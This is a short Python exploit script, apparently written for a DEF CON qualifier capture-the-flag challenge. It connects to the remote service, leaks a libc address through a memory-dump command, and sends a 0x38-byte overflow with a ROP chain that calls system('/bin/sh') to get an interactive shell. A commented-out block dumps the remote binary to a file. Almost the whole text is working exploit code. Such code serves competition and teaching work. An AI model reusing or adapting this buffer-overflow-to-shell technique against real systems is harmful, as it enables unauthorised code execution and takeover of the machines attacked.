from codez import *


r = Remote('int3rupted_3bb8f10793b82841c44a366eb9f27223.quals.shallweplayaga.me',0xcccc)
   

r.read('>')
off= 251072
soff = 288320
binsh=1559771
r.sendline('db 6030B8')
lbase = unpack('Q',r.read('>').split('-')[0].split(':')[1].replace(' ','').decode('hex'))[0] - off

print 'libc',hex(lbase)
poprdi = 0x401A13
r.sendline('g')
r.read('?')
r.write('A'*0x38 + pack('QQQ',poprdi,lbase+binsh,lbase+soff) + "\n")
r.interactive()

# addr = 0x400000
# f = open('elf.dmp','w')
# while True:
#     r.sendline('db 0x%x' %addr)
#     x=r.read('>')[:-2]
#     for l in x.splitlines():
#         print `l`
#         f.write(l.split(':')[1].replace('-',' ').replace(' ','').decode('hex'))
#         f.flush()
#     addr += 0x40